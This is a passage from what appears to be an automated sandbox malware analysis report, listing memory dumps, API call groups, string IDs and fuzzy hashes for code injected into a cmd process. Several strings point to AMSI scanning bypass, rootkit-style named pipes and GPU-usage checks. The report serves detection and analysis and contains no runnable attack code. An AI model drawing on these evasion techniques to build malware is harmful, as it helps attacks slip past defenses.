                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Running Time
                                                                      • API String ID: 1943346504-1805530042
                                                                      • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction ID: a5c45dab3155b6c991891678dd58d5a22b4f13704b35a24c459ad954c5f5ad16
                                                                      • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                                      • Instruction Fuzzy Hash: D831C336F00B60A6E725CF13A8147D9A3A0F788BE9F64492DDE4983626EF38C5568340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CounterInfoProcess$AllocFree
                                                                      • String ID: \GPU Engine(*)\Utilization Percentage
                                                                      • API String ID: 1943346504-3507739905
                                                                      • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction ID: 098585d96da86d639e7812abdcc007cb79738faa2ce067683ede1bbfbdf0cd6e
                                                                      • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                                      • Instruction Fuzzy Hash: AF318531F10B61A6E714DF23A86479963A0FB88FD9F64452DDE5A93726EF38C446C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction ID: b267186a362d2326fa44231677e7708c08cc401f65cdca4405a91bc5fbc23dcc
                                                                      • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                      • Instruction Fuzzy Hash: A3D18D72644BA0AAEB60AF66D4A13FD77B0F74578CF20021DEE8957B96EB34C191C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction ID: 20172e70724608b3d921a8a4b822df295001e9e79b2439f32521e0b4b072609c
                                                                      • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                                      • Instruction Fuzzy Hash: 78418033614B90EAEB64CF22E45439E77A1F388B9DF648129DA8A47758DF38C549CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                      • String ID: \\.\pipe\$nya-childproc
                                                                      • API String ID: 166002920-3933612297
                                                                      • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction ID: 84f67da5e404501b2db620a26e1dd7d35bc2c1f01f744208fa30bd007382449b
                                                                      • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction Fuzzy Hash: 55115132A1875093E710CB22F564799B770F389BD8FA44319EA6943BA9CF3DC145CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000003.2373030928.00000192913B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000192913B0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_3_192913b0000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: e4df7934f2bfe9540c618133e6a55415b2694d319898266e397df482bbbd2916
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: 0C81C030681261A6FA55BB2798723F926B1FB8678CF34401DDE09473D7FB38C9868758
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: c2c23c6fe5d79aad3ad6b1815b7abb3826e0db2e841c23d5f5a6b25331c937b6
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: F081E631F04671A6FA589B679872BE962D4BBA578CF748C1DDA48C73D7DB38C8428300
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629B31
                                                                      • GetLastError.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629B3F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629B69
                                                                      • FreeLibrary.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629BD7
                                                                      • GetProcAddress.KERNEL32(?,?,?,0000019291629C6B,?,?,?,000001929162945C,?,?,?,?,0000019291628F65), ref: 0000019291629BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction ID: 1114f637684ca4c47877a52a6281eb1b61b3513ecdc5bad1e740d58a87b5ecb2
                                                                      • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction Fuzzy Hash: D031EA31B12770A1FE199B1398207D62394FB86BA9FB9092CDD2D87792DF38C445C310
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction ID: 49aaa5bbbb1d3f00cf529decf75059e89793bce3eab839c2c2e3cf8f493465fd
                                                                      • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction Fuzzy Hash: 82118231B10B6096E7508B53E864799A7A0F788FE8F644328EE6E87BD6CF39C4458740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction ID: 4c9dcfce2016a6dfc4527a94d6cbf59325f9ca53b0a36dc8978e79ecd8756171
                                                                      • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction Fuzzy Hash: AFD1C036605BA891DA74CB07E4A439A77A0F3C8B88F604516EECD877AACF3DC541CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Free$CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 564911740-0
                                                                      • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction ID: 850918002e21a7f5e285b56f3926d197a4402c3c96ef0bc89b6c20af32f41744
                                                                      • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction Fuzzy Hash: 7D51E534A01B65A5EB19DB26EC713E423A1FB0474CFA04C1DE96D867ABEF78D529C340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: $nya-
                                                                      • API String ID: 756756679-1266920357
                                                                      • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction ID: 9c06e46c4587c023cc9fab938f4280c33fd663232faa7e8ee5abe3fa34d6c7ee
                                                                      • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction Fuzzy Hash: C031B831B01B75A3EB29DF17D5647A963A4FB48B98F28482CDF4987B56EF34C4628700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Value$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 365477584-0
                                                                      • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction ID: 2ccd2ed0913545e511c864f292ee58e74d2d1674f55bc5cf354694a3b8dffcf5
                                                                      • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction Fuzzy Hash: 1C114231F0167062F61C677364353EE1151BB86BA8F748A2CE976963CBCE38D4018300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction ID: f83d95b8783258dd4d4cd13628dbd287f1fe86aa22e897dc2fa1a9e33723fe51
                                                                      • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction Fuzzy Hash: A6018074B0175092FB249B23E8A939573A0BB48B59F24042DC99D073A6EF3EC049C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction ID: 25313a90cd123075b52064f9d3ea821d62aaa47f9db7c20868b3536d277eb7c0
                                                                      • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction Fuzzy Hash: FAF0C872704694A2FB208B22F5E43D96370F744B8DFD44029DA5983555EF7DC68AC700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction ID: 78c398a1b69a2899a42dece84219ee9bb31329a9e634dc818e3a1fb80ac8e76c
                                                                      • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction Fuzzy Hash: F4F09631F0061161EA148B1698A43A95360FB85769FA4061DDA79461E6CF3CC44AC700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction ID: 0045c7096d6791fdcc58602e75d69d7d4bca24c5b5ddf06a83b739e43f229b14
                                                                      • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction Fuzzy Hash: A5F08274B04BA0A1FE049B13B9241E96260FB4CFC8F648039EE2A47B1ADF3CC4468700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: 7b15116c64ac50c43ead611201900057267caceda234b69a8d4724db697cab45
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: 2AD06730E15665F5EA0D6B13ECB43D42261BB64B09FE4041EC56A422A2DF3D855AC341
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction ID: cba6a25ac5694ed22176e42de099da792cc5ad4f93cdfb1e7cff59962968c64f
                                                                      • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction Fuzzy Hash: 2D02FD32619B9496E764CB56F4A039AB7A0F3C5798F204519EACE87BA9DF7CC444CF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.3524491895.0000019291621000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000019291620000, based on PE: true
                                                                      • Associated: 0000000D.00000002.3523559180.0000019291620000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3525544871.0000019291635000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3526446890.0000019291640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3527383504.0000019291642000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.3528345563.0000019291649000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_19291620000_cmd.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction ID: aafad529d517a6cf4056eb3632e22745c6e6fbc962e270f3c4fa02eaa70dbaca
